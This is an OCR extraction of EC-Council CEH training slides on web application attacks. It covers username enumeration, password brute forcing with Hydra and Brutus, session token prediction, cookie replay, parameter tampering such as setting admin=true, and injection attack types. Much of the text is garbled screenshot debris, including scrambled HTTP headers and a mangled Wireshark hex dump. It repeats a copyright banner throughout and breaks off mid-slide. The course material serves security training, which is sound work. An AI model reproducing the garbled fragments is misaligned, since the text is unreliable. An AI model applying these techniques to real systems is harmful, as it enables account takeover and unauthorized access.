GET /th?id-I.458766150048223l&pid-1.1 HTTP/1.1 Host: ts4.mrn.bing.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.2; 064) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 Accept: */* Referer: http://wwv.bing. com/images/search?q=bikesSid=6CCC767065ClCD3A9D2EABE863 51FE8575D12S94SFOP.M=IQFP.BA Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7, *;c[0.3
i An _r -1 ngp_________________________________________________________________
(z h
zhzh
inished
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
WebAgentl (not saved) - Mixenda Web Agent Ouildei rtttp:/Mrtw1 ftJ^ttK1y< 0 v1 */sa 1 1 o1g * ^ S i% n c 1 * / * 7J0p -;- )H 7 Share 1 8 Pi0d t O rm htip top!... S
- O -c ip
N ow Action Use the tools below to perform actions on ttie oaue Cick an item O f Capture text or im age ) Set jeer input Create a list of items
r
Choose son order Date: Newest
Writ* o Review
Customer Rating Selected Action Modify the behavior of the selected action
L o v t m y tiv i v ' 9/2 1 3 / JJPTCRZY from RO-IIOMC, CA Read s i ru re/6w3 Picture Quolty Sound Quarry Features 5-C &0 5.0
y &
Whet's greet ebout i t WAS VERY EASYTC SET UP, REMOTE EASYTO USE FOR FEATURES *GREAT =>CR.RE AMD FEATJRES VERY USER FREMDLY. EASY TO SET U F WouKS you recommend this productto a friend?; Yes Use the tools above to add a new action to this page modify the behavior of the currently selected action ^
Review Rating
EZ^H
3.0
Begin Item list Review Retinol- Capture Review Rating Capture Review Capture Would recommend v[2J/e 1(2] /drv[4) / d ir l 1
4 J> AJ)
Whets great about it. Great SoundWh... No Whet's greet about it: nice feeturesW... Yes What's great aoout it good price, loo... Yet
l1 /to a d ynjytr[!]/
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Hacking Webservers
5. Once the attacker identifies the web server environment, attackers scan for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrIScan, Nikto, Nessus, Acunetix W eb Vulnerability Scanner, Weblnspect, etc.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
* * * -
" * w o
https://download.hpsmartupdate.com
Copyright by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Im * . J
T m* V i *M . a t !**"* !
M * '^
| O
____j
jj>---a*w in c * * acM *.
! !
s ! L 1 _ J u I ! 1 ! w w w m u 1 t * I t I 1 1 t 1
M > *
9 0 * 4 0 1
1 M C M ' I
h
j P
" 5 s ^ ,hK l
9
X. -
: w "
I * . I P I r tM J * wm m 1 m #n!m -
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
itfciul Nh
EH
Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes
Map the Attack Surface Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers
Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL Tools used: Burp Suite HttPrint WebScarab OWASP Zed Attack Proxy
Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server side technologies
Examine URLs for file extensions, directories, and other identification information
error page
i w
http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0
Microxaft-IISJfl 0
O ops!
Server Error in ,/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .Net Framework Version 4.0.30319; ASP.Net Version 4.0.30319.1
\ 1
Micros oft-IISi'6.0.0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
P H
L l l ________ 1 V V 1 ' 1 1
4
n 1 1 i I 1
Server Error in /ReportServer' Application. Could not find the permission set named 'ASP. Net'. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Version Information: Microsoft Net Framework Version
~
443 7 80 SC
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
s* ci Hi 5!
Examine pagesource and URLs and make an educated guess to determine the internal structure and functionality of web applications
GNU W g e t
T o o ls used:
>>
T e le p o rt Pro B la c k W id o w
&
E x a m in e U R L SSL
A
ASPX Platform A
T ools Used:
0 %
W g e t
Source: http://www.gnu.org
GNU W get is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.
T elep o rt Pro
Source: http://www.tenmax.com Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, T Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.
B lackW idow
____ Source: http://softbvtelabs.com BlackWidow scans a site and creates a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, HTM to M IM E types from any websites. Download video and save as many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, W M V , ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter. Examine URL
SSL
ASPX Platform
If a page URL starts with https instead of http, then it is known as a SLL certified page. If a page contains an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBY, then you can assume that the application is using a database and displays the data by that value.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Urt1fw4
CEH
ilhiul lUtbM
-------------------- ----------------------- --------------------- In f o r m a t io n A tta c k In f o r m a t io n A tta c k ---------------------- --------------------- - H I| Client-Side Validation Injection Attack, Authentication Attack SQL Injection, Data Leakage Directory Traversal Injection Attack Cleartext Communication Error Message Privilege Escalation, Access Controls Data Theft, Session Hijacking Information Leakage
Database Interaction File Upload and Download Display of User-Supplied Data Dynamic Redirects
Cross-Site Scripting Redirection, Header Injection Username Enumeration, Password Brute-Force Session Hijacking, Session Fixation
Email Interaction
Email Injection
Login
Session State
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
In f o r m a t io n
In f o r m a t io n
!^mmaam
Client-Side Validation Injection Attack
Database Interaction
Cleartext Communication
Directory Traversal
Error Message
Information Leakage
Cross-Site Scripting
Email Interaction
Email Injection
Dynamic Redirects
Redirection, Header Injection Username Enumeration, Password Brute-Force Session Hijacking, Session Fixation
Application Codes
Buffer Overflows
Login
Third-Party Application
Session State
W eb Server Software
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
__
C EH
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
The password provided incorrect Account <username> has been locked out
P re d ic ta b le U ser N am es
Some of the applications automatically generate account user names according to some predictable sequence. This makes it very easy way for the attacker who can discern the sequence for potential exhaustive list of all valid user names.
P assw o rd A ttack s
Passwords are cracked based on: Password functionality exploits Password guessing Brute-force attacks
Session A ttacks
The following are the types of session attacks employed by the attacker to attack the authentication mechanism: Session prediction Session brute-forcing Session poisoning
C ookie E xploitation
The following are the types of cookie exploitation attacks: Cookie poisoning Cookie sniffing Cookie replay
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Urt>fW4
CEH
ItliK4I lUilwt
If login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method
Note: User name enumeration from verbose error messages will fail if the application implements account lockout policy i.e., locks account after a certain number of failed login attempts
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r d
P r e s s .c o m
r d
P r e s s .c o m
cassw erg?
ERROR: The password you entered (or the email or username rmimatthews is incorrect Lost vour password?
Email or username
Email or Username
rini.matthews
Password
rinimatthews
Password
Remember Me
Log In
Remember Me
Log In
Note: User name enumeration from verbose error messages will fail if the application implements account lockout policy, i.e., locks the account after a certain number of failed login attempts. Some applications automatically generate account user names based on a sequence (such as userlO l, userl02, etc.), and attackers can determine the sequence and enumerate valid user names.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Determine password change functionality within the application by spidering the application or creating a login account Try random strings for'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality
'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, attacker can guess the challenge answer successfully with the help of social engineering Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved
"Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010 Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms
Copyright by
P assw o rd C h an g in g
Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.
P assw o rd R ecovery
^ - Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.
R e m e m b e r M e E xploit
Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Too ls
P assw o rd D ic tio n a ry
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks
Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra,etc.
% !0 u it
*lout j
Ta1 gl Passwcrts |Tun.ng |0pecific Gtart |
O utojt Hydra v4 * (c) 5 0 0 4 by v a n M a u se r/T H C u s e alloA/Pd only for legal p u rp oses H yda (h ttp / vw .ua Ihc erg) sta rlin g at 2 004-05-17 51:58:52 [DAT AJ 3 2 ta s k s . 1 se rve rs, 4 5 3 8 0 login tries (l:1/p:45380). ~ 1418 tries p e r ta sk [ d a t a ] a r a c k n g s e r \ 1c e ftp on port 21
Username
( U sernam e C U so m a m o Lict test!
P a ssw o rd
(STATUS] 14055.00 Ules/min. 14050 tries In 00:01h. 31324 tcxfoIn 00:0311 [STATUS] 14513.00 tfles/m in. 29020 tries In 00:021). 15354 IcxiOll! 00.0211 [21][Tip] host: 127.0.0.1 login: marc password: success Hyda (Mp.//*#swlHc erg) finished al 2004-05-17 22:01:38 <r1nlshed>
[ 7 Try em pty p a s s w a c ;
Gave Output I
Copyright by
-
J1 = S
or she gets the correct passwords by using the following methods: password list, password dictionary, and various tools.
Attackers create a list of possible passwords using most commonly used passwords, footprinting target and social engineering techniques, and trying each password until the correct password is discovered.
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
T H C -H yd ra
Source: http://www.thc.org
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
THC-HYDRA is a network logon cracker that supports many different services. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.
I I I <0 Quit
III |
HydraGTK
[ h If Ih !
Target Passwords Tuning | Specific | Start | Username ( Username C Username List pas sw ora C Password < Password List Cdon seperated file Use Colon seperated tile (7 Try login as password F Try empty password |/tmp/passlist.txt |testuset
Target | Passwords | Tuning | Specific Start Output Hydra v4 1 (c) 2004 by van Hauser / THC use allowed only for legal purposes. Hydra (http/.www.thc org) starting at 2004-05*17 21 ;58:52 [DATA] 32 tasks. 1 servers. 45380 login tries (l:1/p:45380). ~1418 tries per task [DATA] attacking service ftp on port 21 [STATUS] 14056.00 tnes'min, 14056 tries in 00:01h. 31324 todo in 00:03h [STATUS] 14513.00 tnes^min. 29026 tries in 00:02h. 16354 todo in 00:02h [21 ][Tip] host: 127.0.0.1 lo gin: marc password: success Hydra (http / .,www.thc org) finished at 2004-05-17 22:01.38 <flnished>
S ta rlj
S topj
r.ove Output
Clear Output |
In addition to these tools, Burp Insider is also used for password guessing.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
repeater
window
about
\
intruder
alerts scanner
target
positions j payloads ' options___________________________________ 1.679 616 8.398 080 | brute forcer _________________ j
|[36cdefghijklmnopqfstuvwxy20123456789
max length
to uppercase
B rutus
Source: http://www.hoobie.net Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SM B, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.
Brutus -AET2 -www.hoobie.net/brutus -(January 2000)
File Tools Help
Tjpe | HTTP (Basic Auth) J | Start | Slep | Cleat | Target |127 0 01
<
Authentication Options |7 UseUseiname Usei File | users, txlj Positive Authentication Results Target 127.0.0.1/ 127.0.0.V 1?7nn v Opened user tie containing 6 users. Opened password lile containing 818 Passwords HTTP (Basic Auth) HTTP (Basic Auth)
HTTP IRa ' it A ijlh l
f~
Single User
Browse
Password academic
flrlriA n
Maximum n u r n h p rn ff l u l h f t n l i c r t f i n na l f p m n t sw i lhp 4 9 0 8
Timeout Reject Auth Sea Throttle Quick Kill
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Vulnerable session generation mechanisms that use session IDs composed by user name or other predictable information, like timestamp or client IP address, can be exploited by easily guessing valid session IDs.
GET httD://lanalna:8180/WebGoat/attack?Sereen-17& men u= 4 10 HTTP/1.1 Ho*t:janaina:8180 User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en*US;rv:1.8.1.4) Gecko/20070515 Firefox/2.0.04 Accept:text/xml,appllcatlon/xml,appllcatlon/xhtmk*ml,text/htmd;q-0.9,text/plain;q=0.8,lmage/png,V,',q=0.5 Referer: http://lanaina: 8180/WebGoat/attack?Screen=17&menu=410 Cookie; JSESSIONID=user01 .......................................................... Authorization: Basic23Vic3Q623Vlc3Q
R e q u e st
For certain web applications, the session ID information is usually composed of a string of fixed width. Randomness is essential in order to avoid prediction. From the diagram you can see that the session ID variable is indicated by JSESSIONID and assuming its value as "userOl," which corresponds to the user name. By guessing the new value for it, say as "user 02," it is possible for the attacker to gain unauthorized access to the application.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
dF j 13 Q 1 ?
1 , < 2 >
Brga.Xj
it t
* M c x ilW S .C !S la de .* r r .2 ; EHK4t A p p lV ebK it/537.4 (KETKL I l k Scckol C fcronc/22.0 .1 2 2 9 .9 4 3 C t r l / 5 3 7 .4 C a c h e -C o n ti01: oax-aoe=0 A cc ep t! / R e re re r: n tc r://in .y o n c c .o c a /? p ^ ;3 Aeeept-Enccding: adeft Acce pt-L an ^u iq v: cn-U S,n;q^>.9 Accvpt-C hasavt: XSO-S559-1.at-S;<f-C .7 , jq - 0 . 3 c o o k i : a<u1d015s24s9e12sar4e: < u r-1 3 *4 u ~ c m 3 2 Hoats tr.a 4 lQ 1 e za x.co a
Hi-* *I C .: 19 1 1 _1
History 1!.[
Seaicti ^
Alerts
> ote
Current Scans 0
ran >
spioer j*f* .
Alerts r 0 0 p o f 0
0 wo
Ethical Hacking and Countermeasures Copyright by EC-COlMCil All Rights Reserved. Reproduction is Strictly Prohibited.
passwords or session identifiers to bypass web application authentication. Examples of tools used by the attacker for trapping cookies include O W ASP Zed Attack Proxy, Burp Suite, etc. [ [ O W A SP Zed Attack Proxy Source: https://www.owasp.org O W ASP Zed Attack Proxy Project (ZAP) is an integrated penetration testing tool for testing web applications. It provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
O | ile Edit view Analyse Report Tools Help 1 J td H r i ssi O Q v Q v -*0 b 0 U n title d Sessio n - O W A S P Z A P _1 _1 x 1
f Sites(*! |
f = http // tr adinte y tr yahoo_
f Request1 -* j Response j Break >C ] Header: Text *j Body: Text T (Windows NT 6.2; WOW64) AppleWebKit/537.4 (KHTML, 4 k
C h r o m e / 2 2 .0.1229.94 Safarl/S37.4
[ ^ S p id e r^ : T | [> I I J
j [
Current Scans:0
Alerts
1^0
Current Scans
0 0 0
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Copyright by
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A uthorization A ttack
fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. ^
Crt1fW 4
CEH
itfciul Nm Im
Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input
Attackers first access web application using low privileged account and then escalate privileges to access protected resources
Q uery String
Hidden Tags
Copyright
Authorization Attack
In an authorization attack, the attacker first finds the lowest privileged account and then logs in as an authentic user and slowly escalates privileges to access protected resources. Attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user identifiers, etc. The sources that are used by the attackers in order to perform authorization attacks include uniform resource identifier, parameter tampering, POST data, HTTP headers, query string, cookies, and hidden tags. ID, user name, access group, cost, filenames, file
P a ra m e te r T a m p e rin g
Parameter tampering is an attack that is based on the manipulation of parameters that are exchanged between server and client in order to modify the application data, such as price and quantity of products, permissions and user credentials, etc. This information is usually stored in cookies, URL query strings, or hidden form fields, and that is used to increase in control and application functionality.
l E P P o s t D a t a
Post data often is comprised of authorization and session information, since in most of the applications, the information that is provided by the client must be associated
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
with the session that had provided it. The attacker exploiting vulnerabilities in the post data can easily manipulate the post data and the information in it.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
http: //www. juggyboy.com/mail. aspx?mailbox=john&company=acme%20con1 https :// juggyshop. com/books/download/852741369 .pdf https://juggybank.com/login/home.jsp?admin=true
J Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters
H T T P H e a d e rs J If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities GET http://juggyboy: 8 1 8 0 /Applications/Download?ItemID = 2 0 1 HTTP/1 . 1 Host: janaina: 8 1 8 0 User-Agent: Mozilla/5 . 0 (Window; U; Windows NT 5.2; en-US; rv:1.8.1.4 ) Gecko/ 2 0 0 7 0 5 1 5 Firefox/2.0 . 0 4 Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0 .9 ,text/plain;g=0 . 8,image/png,*/*g=0. 5 Proxy-Connection: keep-alive Referer: http: //juggyboy: 8 1 8 0 /Applications/Download?Admin = False ltemlD= 201 is not accessible as Admin parameter is set to false, attacker can change it to true and access protected items
Copyright by
Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.
HTTP H ea d ers
If the application uses the Referrer header for making access control decisions,
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
ItemID = 201 is not accessible as the Admin parameter is set to false; the attacker can change it to true and access protected items.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Inthe first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism The attacker then traps cookies set by the web application, tampers with its parameters using tools, such as OWASP Zed Attack Pro x y, and replay to the application
https://www.owasp.org
Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
i
y ./ .
web application in order to perform malicious attacks. In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism. The attacker then traps cookies set by the web application, tampers with its parameters using tools such as Paros Proxy, and replays to the application. Source: https://www.owasp.org
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Once the attacker generates the valid session token, the attacker tries to exploit the session token handling in the following ways: 0 Q Session Hijacking Session Replay Man-ln-The-Middle Attack
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
EH
user=jason;app=admin;date=23/ll/201
session token by just changing date and use it for another transaction with server
S e s sio n T o ke n P re d ic tio n
Attackers obtain valid session tokens by sniffing the traffic or legitim ately logging into application and analyzing it for encoding (hex-encoding, Base64) or any pattern If any meaning can be reverse engineered from th e sam ple of session tokens, attackers attem pt to guess th e tokens recently issued to other application users Attackers then make a large num ber of requests w ith the predicted tokens to a session-dependent page to determ ine a valid session token
Copyright by E&CsiMCtl. All Rights Reserved. Reproduction isStrictly Prohibited.
W eak E n co d in g E x am p le
h t t p s : //www.juggyboy. com/checkout?
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B% 64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30 W hen hex-encoding of an ASCII string user= jason;app= adm in;date= 23/ll/20l0, the attacker can predict another session token by just changing the date and using it for another transaction with the server.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
tokens recently issued to other application users. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r cu
JL ^
!7
Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the secure flag is not set, attackers can replay the cookie to gain unauthorized access to application Attacker can use session cookies to perform session hijacking, session replay, and Man-in-the-Middle attacks
W ire sh a rk
Source: http://www.wireshark.org Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
k3J
st v a a m
Filter No. 18 19 20 21 22 23
ile
B (3
v Expression...
< 3. Q. < 3,
Clear Apply Save
Protocol Length 54 TC P D H C Pv 6 150 TCP 91 TCP 60 DHCPV 6 150 TCP 66 TCP TCP HTTP TCP TC P
Info s e r v ic e - c t r l
> h ttp s
[a c k ]
seq = 38 A ck= 38 w ii
S o l i c i t X ID : 0 x 5 a8 2 d f C ID : 000 1000 117e22 aab [T C P se g m e n t o f a r e a s s e m b le d PD U ] x m p p - c l ie n t > q w a v e [ a c k ] s e q - 1 A c k - 3 8 w i n S o l i c i t X ID : 0 x 8 3 e 0 4 9 C I D : 0 0 0 1 0 0 0 1 1 7 e 8 e l4 e w e b m a il- 2 > h t t p [ s y n ] seq = 0 w in= 8 1 9 2 Len= 0 [S Y N , [a c k ]
ack]
24 7 .0 7 6 3 2 4 0 0 1 2 3 .1 0 8 . 4 0 . 3 3 25 7 .0 7 6 6 9 1 0 0 1 0 . 0 . 0 . 5 26 27 28 29 < 1 <1 0060 0070 0080 0090 OOaO OObO OOcO OOdO OOeO OOfO 0 10 0 0 110 0 12 0 0130 0140 3a 65 43 65 54 20 61 6e 54 20 61 2d 2c 65 20 32 U 6t 6c 68 31 74 2e 68 30 63 73 20 2c 70 32 3a 6f 65 75 30 68 63 75 38 68 74 6d 20 72 3a 20 6b 74 2C 3a 3d 61 2c 3a 65 6f 75 70 65 33 41 69 65 20 32 2f 6d 20 35 2d 72 73 6f 2d 34 0 65 64 32 32 3b Od 31 32 43 65 74 73 63 20 bl 3a 3b 32 3a 20 Oa 39 3a 6f 2c 2d 74 68 47 63 20 20 2d 33 64 45 20 30 6e 20 72 2d 65 4d 68 5f 65 53 33 6f 78 4e 30 74 6e 65 63 63 54 bb 6e 78 65 20 6d 70 6f 20 72 6f 76 68 6b 7 .0 7 6 9 0 0 0 0 1 0 .0 .0 .5 7 .1 3 0 4 2 7 0 0 1 2 3 .1 0 8 . 4 0 . 3 3 7 . 1 3 5 7 3 5 0 0 1 2 3 . 1 0 8 .4 0 . 3 3 7 .1 3 6 6 3 5 0 0 1 2 3 .1 0 8 .4 0 . 33
> HI
II >
:2 2 :3 4 G e r : A p ac cooki e : e le t e d ; T h u , 221 0 :2 2 :3 a th - /; d n .c o m .. E T h u , 19 0 8 :5 2 :0 ach e-co n - s to re , , m u s t- r e , p o stp re - ch e M T .. S e r v h e . . S e tn l 8 u =d e x p ir e s sep- 2 0 1 1 3 GMT; p o m a in - . x p ir e s : N ov 1981 0 GMT. .C t r o l : no no-cache e v a lid a t check = 0 . ck = 0 . . P r Profile: Default
Od Od 31 70 70 47 61 69 76 47 6f 2d 61 65 3d
Oa Oa 38 69 2d 4d 69 72 20 4d 6C 63 6c 63 30
53 53 75 72 32 54 6e 65 31 54 3a 61 69 6b Od
65 65 5f 65 30 3b 3d 73 39 Od 20 63 64 3d Oa
72 /4 3d 73 31 20 2e 3a 38 Oa 6e 68 61 30 50
76 2d 64 3d 31 70 69 20 31 43 6f 65 74 2c 72
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
Attack W eb Servers
Attack W eb Services
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
In jectio n A ttacks
J the interpreted language being used in order to break application's normal intended
Urt1fw4
CEH
ilhiul lUthM
In injection attacks, attackers supply crafted malicious input that is syntactically correct according to
SQL Injection
If user input is used into code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server
Enter a series of malicious SQL queries into input fields to directly manipulate the database
B B
OS Com m ands Injection Exploit operating systems by entering malicious codes in input fields if applications utilize user input in a system-level command
LDAP Injection
Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases
SMTP Injection Inject arbitrary STMP commands into application and SMTP server conversation to generate large volumes of spam email
XPath Injection Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic
Note: For complete coverage of SQL Injection concepts and techniques refer to Module 14: SQL Injection
Copyright by
Injection Attacks
In injection attacks, attackers supply crafted malicious input that is syntactically correct
according to the interpreted language being used in order to break the application's normally intended input. Q W eb Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command SM TP Injection: Inject arbitrary SMTP commands into application and SMTP server conversation to generate large volumes of spam email 0 SQL Injection: Enter a series of malicious SQL queries into input manipulate the database LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic fields to directly
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection Attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Attack W eb Servers
Copyright
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
r~
Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries Data Connectivity Attacks
S S
Example of a common connection string used to connect to a Microsoft SQL Server database
0r r 0r r 0r r 0r r <s= 0T r o
